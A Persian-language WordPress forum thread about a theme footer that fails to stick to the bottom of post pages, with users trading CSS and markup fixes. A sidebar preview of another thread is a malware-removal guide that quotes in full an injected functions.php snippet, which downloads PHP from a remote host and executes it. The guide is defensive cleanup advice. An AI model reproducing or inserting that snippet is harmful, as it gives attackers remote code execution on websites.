• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
M.Hajloo

مشکل نچسبیدن فوتر به ته قالب

25 پست در این موضوع قرار دارد

درود

فوتر قالب توی نوشته ها که میرم به ته قالب نمیچسبه و وسط صفحه بعد از بخش نظرات دیگه ثابت میمونه

توی فایل single.php جایی که <?php include("footer.php"); ?> وجود داره قبل و بعدش هم کلی </div> کم و زیاد کردم اما درست نشد

این هم کد css بخش فوتر قالب هست :


.footer {
width:100%;
margin:0px auto;
height:150px;
background:url(images/bg-black.jpg);
box-shadow:inset 0px 0px 10px #000000;
direction:rtl;
border:1px solid #FFF;
text-align:center;
margin-top:10px;
color:#FFFFFF;
-webkit-border-top-left-radius: 10px;
-webkit-border-top-right-radius: 10px;
-moz-border-radius-topleft: 10px;
-moz-border-radius-topright: 10px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
}
.footer img {
float:right;
box-shadow:0 0 3px #000000;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
margin:30px 20px 0 0;
}
.footer .copyright {
float:right;
text-align:center;
width:500px;
}
.footer-menu {
width:310px;
margin:10px auto;
}
.footer-menu li {
float:right;
margin:0 5px;
}
.footer a {
color:#CCC;
text-shadow:1px 1px 1px #000000;
}
.footer a:hover {
color:#C00;
text-shadow:1px 1px 1px #000000;
}

این هم 1 نمونه آنلاین :

http://ariyanet.net/36745/%D8%AE%D8%A7%D8%B7%D8%B1%D9%87-%D8%AA%D9%84%D8%AE-%D9%85%D9%87%D9%86%D8%A7%D8%B2-%D8%A7%D9%81%D8%B4%D8%A7%D8%B1-%D8%A7%D8%B2-%D8%AE%D8%A8%D8%B1-%D8%A7%D8%B2%D8%AF%D9%88%D8%A7%D8%AC%D8%B4.html

ممنون میشم لطفاً راهنمائی بفرمائید

0

به اشتراک گذاری این پست


لینک به پست

سلام

خاصیت clear رو برابر both قرار بدید در div فوتر .


.footer{
clear:both;
}

ویرایش شده در توسط rezakianoosh
3

به اشتراک گذاری این پست


لینک به پست

سلام

خاصیت clear رو برابر both قرار بدید در div فوتر .


.footer{
clear:both;
}

ببخشید من دقیقاً متوجه منظورتون نشدم

من کد clear:both; را در به .footer اضافه کردم اما تغییری انجام نشد

ممنون میشم1 خورده کاملتر راهنمائی بفرمائید

0

به اشتراک گذاری این پست


لینک به پست

این کد رو جایگزین کد قبلی کنید :





.footer {
width:100%;
margin:0px auto;
height:150px;
background:url(images/bg-black.jpg);
box-shadow:inset 0px 0px 10px #000000;
direction:rtl;
border:1px solid #FFF;
text-align:center;
margin-top:10px;
color:#FFFFFF;
-webkit-border-top-left-radius: 10px;
-webkit-border-top-right-radius: 10px;
-moz-border-radius-topleft: 10px;
-moz-border-radius-topright: 10px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
clear:both;

}
.footer img {
float:right;
box-shadow:0 0 3px #000000;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
margin:30px 20px 0 0;
}
.footer .copyright {
float:right;
text-align:center;
width:500px;
}
.footer-menu {
width:310px;
margin:10px auto;
}
.footer-menu li {
float:right;
margin:0 5px;
}
.footer a {
color:#CCC;
text-shadow:1px 1px 1px #000000;
}
.footer a:hover {
color:#C00;
text-shadow:1px 1px 1px #000000;
}

ویرایش شده در توسط honda.moji
1

به اشتراک گذاری این پست


لینک به پست

این کد رو جایگزین کد قبلی کنید :





.footer {
width:100%;
margin:0px auto;
height:150px;
background:url(images/bg-black.jpg);
box-shadow:inset 0px 0px 10px #000000;
direction:rtl;
border:1px solid #FFF;
text-align:center;
margin-top:10px;
color:#FFFFFF;
-webkit-border-top-left-radius: 10px;
-webkit-border-top-right-radius: 10px;
-moz-border-radius-topleft: 10px;
-moz-border-radius-topright: 10px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
clear:both;

}
.footer img {
float:right;
box-shadow:0 0 3px #000000;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
margin:30px 20px 0 0;
}
.footer .copyright {
float:right;
text-align:center;
width:500px;
}
.footer-menu {
width:310px;
margin:10px auto;
}
.footer-menu li {
float:right;
margin:0 5px;
}
.footer a {
color:#CCC;
text-shadow:1px 1px 1px #000000;
}
.footer a:hover {
color:#C00;
text-shadow:1px 1px 1px #000000;
}

درود این کد را همانطور که در تاپیک قبلی اعلام کرده بودم خودم تست کردم اما مشکل برطرف نشد

به هر حال ممنون

0

به اشتراک گذاری این پست


لینک به پست

حالا دقیق نمیدونم ولی اگه توی صفحه ای که دادید مقدار margin-top: 32%; رو تغییر دادم رفت انتهای صفحه :P

حالا یه تست بگیرید ببینید چی میشه و توی بقیه صفحه ها هم درست میشه یا نه ^_^

1

به اشتراک گذاری این پست


لینک به پست

به کلاس .footer اضافه کنید


margin-top:320px;

2

به اشتراک گذاری این پست


لینک به پست

حالا دقیق نمیدونم ولی اگه توی صفحه ای که دادید مقدار margin-top: 32%; رو تغییر دادم رفت انتهای صفحه :P

حالا یه تست بگیرید ببینید چی میشه و توی بقیه صفحه ها هم درست میشه یا نه ^_^

ممنون اما این کار هم متاسفانه جواب نداد !

0

به اشتراک گذاری این پست


لینک به پست

دوست عزیز به کلاس فوتر کدی که گفتم رو اضافه کنید مورد حل میشه ، بعد از وارد کردن Ctrl+F5 برای لود از نو استایل یادتون نره ..

1

به اشتراک گذاری این پست


لینک به پست

به کلاس .footer اضافه کنید


margin-top:320px;

روی یکی از پست هام که داشتم تست میکردم روی 480 قرار دادم درست شد

اما اینطوری الان 1 مشکلی هست

اگر یکی از مطالب خیلی کوتاه باشه مثلاً فقط 1 عکس باشه فاصله فوتر با بقیه بخش ها خیلی زیاد میشه 1 جورایی به صورت اتوماتیک عمل نمیکنه

امکانش وجود نداره که اتوماتیک کار کنه ؟

0

به اشتراک گذاری این پست


لینک به پست

کلا فوتر سایت شما فرسنگ ها با بالاترش فاضله داره. میخواین کلا بچسبه؟

توی استایل برای فوترتون نوشتید:

margin-top:480px;

3

به اشتراک گذاری این پست


لینک به پست

کلا فوتر سایت شما فرسنگ ها با بالاترش فاضله داره. میخواین کلا بچسبه؟

درود این فاصله به خاطر تغییراتی هست که آقا سعید الان گفتند و انجام دادم ، مقدار margin-top را که روی همون 10 قرار بدم فوتر توی صفحه اصلی و بخش ها به خوبی کار میکنه

مشکل من داخل پست ها هستش

توی بعضی از پست ها که متن کوتاه داره فوتر به ته قالب نمیچسبه

نمونه :

1365953320.png

0

به اشتراک گذاری این پست


لینک به پست

برای اینکه توی تماممطالبتون فوتر پایین بیاد مقدار رو با درصد وارد کنید : margin-top:20%; و مقدار 20 رو اینقدر تغییر بدید تا دقیقا چیزی که میخاین از اب در بیاد .

1

به اشتراک گذاری این پست


لینک به پست

فکر میکنم محل قرار گرفتن کد فوتر درست نباشه چون اگه استایل درست باشه اصلا نباید فوتر زیر سایر عناصر قرار بگیره ..

4

به اشتراک گذاری این پست


لینک به پست

برای اینکه توی تماممطالبتون فوتر پایین بیاد مقدار رو با درصد وارد کنید : margin-top:20%; و مقدار 20 رو اینقدر تغییر بدید تا دقیقا چیزی که میخاین از اب در بیاد .

با این روش جواب نگرفتم دوست من

با این روش فقط همون پستی که داری روش تست میکنی اوکی میشه و بقیه بخش ها مثل صفحه اصلی و ... بهم میریزه

فکر میکنم محل قرار گرفتن کد فوتر درست نباشه چون اگه استایل درست باشه اصلا نباید فوتر زیر سایر عناصر قرار بگیره ..

این کدها چند تا خط آخر فایل single.php هست 1 نگاه بندازید شاید ایراد از این بخش باشه :


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
<?php include("footer.php"); ?>
</div>
</body>
</html>

0

به اشتراک گذاری این پست


لینک به پست

توی همین کد single.php فراخوانی ساید رو بیارید دقیقاً بالای فراخوانی فوتر قرار بدید ببینیم درست میشه؟

البته الان دیدم که فراخوانی درسته به جاش دایو بین دو فراخوانی رو حذف کنید و امتحان کنید

در ضمن ببینید دایو ها درست بسته شدند یا نه

1

به اشتراک گذاری این پست


لینک به پست

کد رو به این صورت تغییر بدید .


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
<?php include("footer.php"); ?>
<div class="clear"></div>
</div>
</body>
</html>

1

به اشتراک گذاری این پست


لینک به پست

دوست عزیز لطف کنید اگر به نتیجه نرسیدید کدها را به حالت قبل برگردونید و صفحه footer.php را باز کنید و بگردید دنبال


<div class="footer">

و یک خط قبلش اضافه کنید


<div style=:display:block;clear:both"> </div>

و تست بگیرید

1

به اشتراک گذاری این پست


لینک به پست


<div class="clear"></div>

را قبل از فوتر قرار بده.

1

به اشتراک گذاری این پست


لینک به پست

کد رو به این صورت تغییر بدید .


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
<?php include("footer.php"); ?>
<div class="clear"></div>
</div>
</body>
</html>

کد رو به این صورت تغییر بدید .


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
<?php include("footer.php"); ?>
<div class="clear"></div>
</div>
</body>
</html>

جسارتا این کد

با این روش جواب نگرفتم دوست من

با این روش فقط همون پستی که داری روش تست میکنی اوکی میشه و بقیه بخش ها مثل صفحه اصلی و ... بهم میریزه

این کدها چند تا خط آخر فایل single.php هست 1 نگاه بندازید شاید ایراد از این بخش باشه :


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
<?php include("footer.php"); ?>
</div>
</body>
</html>

اگر باز هم نتیجه نگرفتید محتویات فایل فایل footer.php را هم کپی کنید فکر کنم اشتباهی شده در صفحه single.php نباید کدهای </body> , </html> وجود داشته باشند

1

به اشتراک گذاری این پست


لینک به پست

اقا راه حل رو پیدا کردم .

کد رو به این شکل تغییر بده تا فوتر بیاد پایین .


<?php include("side-left.php"); ?>
</div>
<div class="clear"></div>
</div>
<?php include("footer.php"); ?>
<div class="clear"></div>
</body>
</html>

خاصیت clear رو که گفتم تو فوتر بزار both رو هم یادت نره تو css اضافه کنی .

1

به اشتراک گذاری این پست


لینک به پست

دوستان تمام کارهایی را گفتید انجام دادم اما باز هم نتیجه نگرفتم

فایل های single و footer را ضمیمه کردم ممنون میشم 1 نگاه بندازید

این هم css بخش فوتر


.footer {
width:100%;
margin:0px auto;
height:150px;
background:url(images/bg-black.jpg);
box-shadow:inset 0px 0px 10px #000000;
direction:rtl;
border:1px solid #FFF;
text-align:center;
margin-top:10px;
color:#FFFFFF;
-webkit-border-top-left-radius: 10px;
-webkit-border-top-right-radius: 10px;
-moz-border-radius-topleft: 10px;
-moz-border-radius-topright: 10px;
border-top-left-radius: 10px;
border-top-right-radius: 10px;
clear:both;
}
.footer img {
float:right;
box-shadow:0 0 3px #000000;
-webkit-border-radius: 10px;
-moz-border-radius: 10px;
border-radius: 10px;
margin:30px 20px 0 0;
}
.footer .copyright {
float:right;
text-align:center;
width:500px;
}
.footer-menu {
width:310px;
margin:10px auto;
}
.footer-menu li {
float:right;
margin:0 5px;
}
.footer a {
color:#CCC;
text-shadow:1px 1px 1px #000000;
}
.footer a:hover {
color:#C00;
text-shadow:1px 1px 1px #000000;
}

cod.zip

0

به اشتراک گذاری این پست


لینک به پست

مشکل رو فهمیدم مشکل از سایدبار سمت چپتون هست شما اومدید برای هر یک از اون چهار باکس یک استایل دادید بعد باز بالاش یک استایل left دادید اون استایل left رو باید بردارید و همون رو در اون 4 استایل دیگر بزارید الان اگر از توی قالب <div style="left> و آخرین </div> رو بردارید فوتر درست می شه ولی اون چهار تا باکستون مشکل پیدا می کنه

بعد از این که اون کد دایو رو برداشتید برید به سی اس اس و این چند تا کد را پیدا کنید و مقدار width را اینقدر تغییر بدید تا اندازه باکس هاتون درست بشه

sidebox-rright

sidebox-left

sidebox-2right

sidebox-2right2

sidebox-1right

ویرایش شده در توسط ariaieboy
2

به اشتراک گذاری این پست


لینک به پست

اگرم باز نتونستید درست کنید فایلی که کد های مربوط به فوتر و ساید بار ها هست رو به من بدید با سی اس اس تا درستش رو بهتون بدم

اگر کار هایی که من گفتم رو انجام بدید اینجوری می شه قالبتون و فوتر همیشه هر چقدر هم مطلبتون باشه این پایین اینجوری می مونه

post-1293-0-81019900-1365874178_thumb.jp

ویرایش شده در توسط ariaieboy
1

به اشتراک گذاری این پست


لینک به پست

دوستان از همگی ممنون هستم که راهنمائی کردید

مشکل از .left توی css به خاطر بخش های جدیدی که اضافه کرده بودم بود

دوستی که زحمت قالب را برایم کشیده بود بهش گفتم 1 نگاهی انداخت و درستش کرد

تشکر از همگی :)

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط yaali
      بنام خدا
      :::لینک دانلود قالب فراسر:::
      دانلود قالب  
      خیلی وقت هست که به دنبال یک قالب وردپرسی ای بودم که جدا از ساده بودن، بتوانم با آن کد لایسنس و چیزایی از این دست بفروشم. علاوه بر اون کد فروخته شده بلافاصله به شماره موبایل مشتری هم پیامک بشه.
      قالبها و افزونه های زیادی ادعا داشتند که می توانند این کار را انجام دهند؛ اما در واقع هیچکدام کامل نبودند و پاسخی برای نیاز صاحبان فروشگاه نداشتند.
      بالاخره بر آن شدیم تا یه قالب ساده و در عین حال سریع و کارآمد برای این کار آماده کنیم. بعد از فراز و نشیب های بسیار، الان در خدمت شما هستیم با معرفی قالب فراسر.
      قالب فراسر یک قالب وردپرس هست که با اون میشه کارای زیادی رو انجام داد. یه نمونه ی معروف از اون فروش کارت شارژ هست. از طرف دیگه میشه با اون کد لایسنس هم فروخت. یعنی یه سایت فروش لایسنس آنتی ویروس داشت.
      با قالب فراسر می تونید هر نوع خدمتی که بر اساس کد و یا متن باشه انجام دهید. مثل فروش اپل آیدی و یا فروش یه جمله عاشقانه به طوری که هر جمله در یک سطر باشه و آپلود بشه و ...
      تصاویری از قالب فراسر رو می بینید:

      این قالب توسط قلم سافت کدنویسی و آماده شده است و زحمت فارسی سازی اون رو بچه های همیاروردپرس کشیدن که به نشانه ی تشکر، متن پایین وبسایت حفظ شده است.
      هنگامی که بر روی هر کدام از دکمه های پرداخت کلیک کنید؛ با صفحه ی زیر منتقل می شوید:

      این تصویر در واقع سبد خرید شماست. این صفحه به صورت خودکار به صفحه پرداخت منتقل می شود. انتقال خودکار اختیاری است که می توانید آن را از این صفحه حذف نمایید.
      در ادامه کاربر به صفحه زیر هدایت می شود. در این صفحه با وارد کردن تنها شماره موبایل خود می تواند خرید را انجام دهد. وارد کردن پست الکترونیکی اجباری نیست.
       

      بعد از وارد کردن اطلاعات و پرداخت، بلافاصله کد مدنظر، به شماره شما پیامک می گردد. این قالب بر اساس پنل پیامکی sms.ir نوشته شده است. بزودی پنل های پیامکی  دیگر نیز به این قالب اضافه خواهند شد.
       
      اگر شما هم مدتهاست که به دنبال چنین قالبی هستید می توانید هم اکنون با کلیک بر روی متن آن را دانلود کنید
       
    • توسط نگار صادقی
      سلام وقت همگی بخیر.
      دوستان قالب 2017 پیشفرض وردپرس قالب خوبیه؟
      سئوش خوبه؟
      کدنویسی بهینه شده شده است؟
      ممنونم
       
    • توسط shamea
      قالب سایتم درست بود یهوریخت بهم
      هیچ چیزم نصب نکردم هیچ کاریشم نکردم
      ادرسش اینه
      http://diacoshop.ir/
      اون قسمت های بالاش اسلایدبار بود هرکت میکرد الان ثابت شده حرکت نمیکنه
      مثه این بود:
      https://hamyarwp.com/preview/store/
      این دموشه
       
      لطفا یکی کمک کنه
    • توسط sultansulay
      سلام  دوستان عزیز
      خسته نباشید
      بنده یه مشکلی دارم اونم اینه که بعد از نصب هر قالبی که فارسی باشه
      قالب سایت بهم میریزه
      مثل بلوک ها یا هدرش  یا ادامه مطلب به شات توجه کنید متوجه میشید
      از هاست سی پنل استفاده میکنم و رایگان نیستش